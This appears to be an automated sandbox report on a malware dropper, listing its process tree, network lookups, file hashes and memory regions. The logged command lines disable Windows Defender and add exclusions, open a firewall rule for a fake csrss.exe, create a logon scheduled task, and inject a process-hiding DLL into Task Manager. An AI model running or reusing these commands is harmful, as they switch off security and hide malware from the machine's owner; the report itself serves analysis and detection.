PID 4100 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4100 wrote to memory of 3336 N/A C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4504 wrote to memory of 3644 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

Wed1095e8d3cef4ec773.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe

Wed10b607271059cb7.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe

Wed10d7483856.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a80f141fb08.exe

Wed10a80f141fb08.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe

Wed10a0affb29d.exe

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp" /SL5="$40216,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp" /SL5="$60028,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3388 -ip 3388

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 468

C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QUT4G.tmp\Wed10fa57e769925f6.tmp" /SL5="$A0232,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

"C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /306-306

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Program Files (x86)\Gparted\Build.sfx.exe

"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1

C:\Program Files (x86)\Gparted\Build.exe

"C:\Program Files (x86)\Gparted\Build.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com

C:\Program Files (x86)\Gparted\gimagex.exe

"C:\Program Files (x86)\Gparted\gimagex.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4328 -ip 4328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2016

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 webdatingcompany.me udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 buy-fantasy-gxmes.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 tweakballs.com udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 trumops.com udp
US 8.8.8.8:53 retoti.com udp
US 8.8.8.8:53 logs.trumops.com udp
US 8.8.8.8:53 logs.retoti.com udp
US 8.8.8.8:53 7db13717-0c39-4c6b-8058-f297c90a5396.uuid.trumops.com udp
US 8.8.8.8:53 server10.trumops.com udp
US 44.221.84.105:443 server10.trumops.com tcp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.yahoo.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.21:443 bitbucket.org tcp
US 8.8.8.8:53 21.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 www.hdkapx.com udp
US 8.8.8.8:53 server10.retoti.com udp
US 44.221.84.105:443 server10.retoti.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 bitcoins.sk udp
SK 46.229.238.187:56001 bitcoins.sk tcp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 2electrumx.hopto.me udp
US 8.8.8.8:56021 2electrumx.hopto.me tcp
US 8.8.8.8:53 2electrumx.hopto.me udp
US 8.8.8.8:53 2electrumx.hopto.me udp
GB 198.244.201.86:50001 bitcoin.lu.ke tcp
US 8.8.8.8:53 2electrumx.hopto.me udp
US 8.8.8.8:53 2electrumx.hopto.me udp
US 8.8.8.8:53 2electrumx.hopto.me udp
US 8.8.8.8:53 2electrumx.hopto.me udp
US 208.88.16.38:57001 blackie.c3-soft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 532d84cb3e0928c7bedc0a89611837da
SHA1 b7dec859275a299e9c95833be01b055b2f9b91d7
SHA256 9aca2b6f263e24f8161def69b0e8a3a8dbc60bf46ee75714531e7ca09e4e9616
SHA512 c80f46401569b3c20eeeb7225f688e99dc94a70a8caf7200141069c3b43c8df7d4b9846174a22e05a50bd775ebe7342f1f0774b3cf1213f3535ee936e7d85366

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/4100-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-79-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-76-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4100-75-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4100-74-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4100-71-0x0000000000F40000-0x0000000000FCF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4100-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-86-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-85-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-83-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-81-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a0affb29d.exe

MD5 d60755a29f9dc368fe71fbadf96b640c
SHA1 d3ac47604f6d91cbc76d9013ba9b3c779f69ad27
SHA256 1129ef957be36f46c5ba500a3f48a237069006b699d570360f876f6c186a7606
SHA512 7dadfa4c0401e688ef0ab6f2c5b175f4943243bd97c4310f0f0bbb9fd7f096e80993ea4e9d598109ee6d0436ff2331d485966c831054960cf62ce97b58102c8a

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1015ba90d2.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

memory/4100-111-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4100-110-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4996-112-0x00000000050C0000-0x00000000050F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1095e8d3cef4ec773.exe

MD5 0426dbe3753b2d07d3612fceb824a182
SHA1 4f28da2d30710389cabf10385cb8dc5cbf4be74a
SHA256 6fbe7d2d78413b54c593100e706e727f771714e2fa1b584bdc57836b1bd44d60
SHA512 f6aa58bbfd5f976a76da7b12d60d63326d6d78996cb849e0d4075a7f1ea6ce9eb69d90ec5c68e27de9ab4ec4625090a575f2e3b56ff7e28463fabcaa076c4ddd

memory/4996-114-0x0000000005850000-0x0000000005E78000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10fa57e769925f6.exe

MD5 314e3dc1f42fb9d858d3db84deac9343
SHA1 dec9f05c3bcc759b76f4109eb369db9c9666834b
SHA256 79133c9e1cdfdfada9bc3d49ba30d872c91383eb7515302cd7bd2e1c5b983b08
SHA512 23f6c8f785c6d59d976d437732d1ea5968403239c5f8c3ca83983d1a0b3d9f8426803b7de7c2e819d16a1fb35f9e24461593fdcc75cd81ddc0076c22ed1e45f2

memory/2840-124-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/932-128-0x0000000005360000-0x0000000005382000-memory.dmp

memory/3988-141-0x0000000000DF0000-0x0000000000DF6000-memory.dmp

memory/3988-156-0x000000001B0D0000-0x000000001B100000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-A2EPA.tmp\Wed10b607271059cb7.tmp

MD5 ed5b2c2bf689ca52e9b53f6bc2195c63
SHA1 f61d31d176ba67cfff4f0cab04b4b2d19df91684
SHA256 4feb70ee4d54dd933dfa3a8d0461dc428484489e8a34b905276a799e0bf9220f
SHA512 b8c6e7b16fd13ca570cabd6ea29f33ba90e7318f7076862257f18f6a22695d92d608ca5e5c3d99034757b4e5b7167d4586b922eebf0e090f78df67651bde5179

C:\Users\Admin\AppData\Local\Temp\is-Q6HS0.tmp\Wed10fa57e769925f6.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/932-143-0x0000000005E30000-0x0000000006184000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zclzbp2b.tqr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/932-130-0x0000000005570000-0x00000000055D6000-memory.dmp

memory/932-129-0x0000000005500000-0x0000000005566000-memory.dmp

memory/3988-127-0x0000000000610000-0x0000000000652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

memory/2836-119-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10b607271059cb7.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10d7483856.exe

MD5 6d8ff7889acdcfd9f785e073e6ab4f4d
SHA1 5a878803d1c355fae35d684f59f26c1b4a838e6c
SHA256 8e50b8cdea9a829fe00a3d81bad328f6f76581d20ba9cc8cf6d8642d0aa882c7
SHA512 fcb23c40e31839402927dc1cdecf750d4c32c609f42337741f400069c8763599ad6604ed9d7fd86d7d6ee7d6f7b4eca7d132ceb5796f2dad99223e619897b3ab

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10eb606bd1d021d.exe

MD5 99471e8043cb5f141962e1cfe12d44f4
SHA1 57c6baf415f892dfa82c206c1380a34130dad19d
SHA256 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
SHA512 a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

memory/4100-109-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4100-108-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4100-106-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4100-102-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed10799545d143108.exe

MD5 6bddb7edd2648c177e0ef423cc7df23f
SHA1 d83a67835d694dc9d2726794e9c0a1d10bb1c06a
SHA256 af86823aa88c173cb727965d8a7a7d336c4d47e8d4286e0c22e2f2b7ef314e35
SHA512 761e1bd36d6ad0ff68f53784e34a3a34d936e1ec670a7a3692ad20d3bfde20484a593ababf1559ed85590b2481eaba4849b15022c6c0586dbe30237790f4a20a

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed1001440e7e09.exe

MD5 a66e417ccbb28f68b13711bcfc2c4f9f
SHA1 d0076ec3fd9c50816e3385f1d4ce6231411a2f19
SHA256 91bc4939340bf81d9a1c4e8d5b58717691070e67f2a802fe8b6e5f6f6af39f59
SHA512 215779aa9782dc3568b3463967bab83629c1b84d0fec319f25ec98c8c51e460ad74bcd0261f80690c116139e20b9ff12a8a30777e372fe5eefc770dd35fe0f32

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed103b2f384c2a.exe

MD5 5d436a862c018c54ce2427968c556325
SHA1 97d03f2ed1c32b1de5467414a1c2fea6eb86404a
SHA256 060b9cbca548f4fbd738d79b735852476783b7bce3b373ec620b31fb9f8e39dc
SHA512 2c16938ca1a944b36f944d74ffdb5f6ec4c5f8a49688d6746d966cafcd55287b2794b010875bc3868b3a8e7a587b0160ee564244e98b61e8a59b978954b2ba78

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed101f2195049.exe

MD5 5eec35ae4619a7992130f13f66b03002
SHA1 47141ead2a1166234970c3dba5821cee57ddbb4d
SHA256 947efb32f120d30758ff6801dd1118922cff317411e87906aa9153fe928b1156
SHA512 5f8ae8110b7aa626cf1002f1f214ccc2fd09956cb9d2d82d31115adee356ffd529d1eef4f32a2f193fd862029f930ad01f068b22335d61a00ae5b25106c0590a

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed109189c07b.exe

MD5 5b3913c5aaf3e1a91ca73679603ec70b
SHA1 1df5b353c591b14989fae254fb47a529aadd3338
SHA256 8e554195273cc328d37d7e255cbaac6589eb44d596e6e2fea6d3766bf2908d7b
SHA512 c90d8d68591478d095ce86ae5c0c4f654023937d31c35390d3c622ecd2e8c4b9a5b3598cfe49419c094afcb699b95f489016b39799db4949d976d814a05efae3

C:\Users\Admin\AppData\Local\Temp\7zS462B5FB7\Wed106168c8ce90b57b8.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\is-MDNR8.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/3988-166-0x0000000000E00000-0x0000000000E06000-memory.dmp

memory/932-169-0x0000000006310000-0x000000000632E000-memory.dmp

memory/2880-178-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2836-179-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-3ITUN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/932-177-0x0000000006850000-0x000000000689C000-memory.dmp

memory/4608-174-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3388-192-0x0000000000400000-0x000000000042C000-memory.dmp

memory/932-194-0x0000000070540000-0x000000007058C000-memory.dmp

memory/932-193-0x00000000072C0000-0x00000000072F2000-memory.dmp

memory/932-204-0x00000000068F0000-0x000000000690E000-memory.dmp

memory/932-205-0x0000000007310000-0x00000000073B3000-memory.dmp

memory/4996-206-0x0000000070540000-0x000000007058C000-memory.dmp

memory/932-216-0x0000000007D40000-0x00000000083BA000-memory.dmp

memory/932-217-0x0000000007440000-0x000000000745A000-memory.dmp

